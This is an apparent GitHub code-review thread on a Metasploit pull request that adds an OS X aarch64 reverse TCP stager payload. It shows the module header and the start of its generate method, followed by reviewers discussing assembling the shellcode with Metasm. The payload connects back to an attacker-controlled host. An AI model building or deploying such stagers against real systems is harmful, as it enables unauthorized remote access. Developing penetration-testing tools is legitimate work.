modules/payloads/stagers/osx/aarch64/reverse_tcp.rb

```diff
@@ -0,0 +1,131 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+###
+#
+# ReverseTcp
+# ----------
+#
+# Osx reverse TCP stager.
+#
+###
+module MetasploitModule
+  CachedSize = 328
+
+  include Msf::Payload::Stager
+
+  def initialize(info = {})
+    super(
+      merge_info(
+        info,
+        'Name' => 'Reverse TCP Stager',
+        'Description' => 'Connect back to the attacker',
+        'Author' => 'usiegl00',
+        'License' => MSF_LICENSE,
+        'Platform' => 'osx',
+        'Arch' => ARCH_AARCH64,
+        'Handler' => Msf::Handler::ReverseTcp,
+        'Stager' => { 'RequiresMidstager' => false },
+        'Convention' => 'sockedi'
+      )
+    )
+  end
+
+  def generate(_opts = {})
+    encoded_port = [datastore['LPORT'].to_i, 2].pack('vv').unpack('N').first
+    encoded_host = Rex::Socket.addr_aton(datastore['LHOST'] || '127.127.127.127').unpack('V').first
+    retry_count = datastore['StagerRetryCount']
+    seconds = datastore['StagerRetryWait']
+    sleep_seconds = seconds.to_i
+    sleep_nanoseconds = (seconds % 1 * 1000000000).to_i
+
+    payload = [
+      # Generated from external/source/shellcode/osx/aarch64/stager_sock_reverse.s
```

Comment:
I know this is the existing pattern, but I don't suppose you looked into seeing if Metasm could compile this for us? 

i.e. similar to this pattern (but obviously not MIPs etc)

https://github.com/rapid7/metasploit-framework/blob/88a539a82cd8b48b1185b3b5d80b1857c64f1bc1/modules/encoders/mipsbe/byte_xori.rb#L50

Reply:
If it works as expected, and is a nicer workflow - then I think that would be a good idea :+1:

Reply:
Upstream does https://github.com/jjyg/metasm/blob/06adbc4e4a5d77b6820182e498a34f33c0268d34/metasm/cpu/arm64/opcodes.rb

We likely need to do some testing though and update the fork to release a new gem.

Reply:
Echo'ing the above - looks like the rapid7 fork and the latest metasm code are both on the same commit `0a51957 · 4 years ago History` where the arm64 parser isn't implemented upstream:

https://github.com/jjyg/metasm/blob/06adbc4e4a5d77b6820182e498a34f33c0268d34/metasm/cpu/arm64/parse.rb#L16-L18

So calling the parser explodes:

```
>> Metasm::Shellcode.assemble(Metasm::ARM64.new, "mov x0, #1\n").disassemble.decoded
/path/metasm/cpu/arm64/parse.rb:17:in `parse_argument': at "\"<unk>\"" line 1: fu (Metasm::ParseError)
```

So it looks like metasm support shouldn't be a blocker to this PR, although I imagine we'll need metasm arm support again in the future 😄

Reply:
I'll mark this idea/thread as resolved as it's not a viable approach; I've created an upstream Metasm issue https://github.com/jjyg/metasm/issues/45 to discuss adding aarch64 support - definitely not a blocker 👍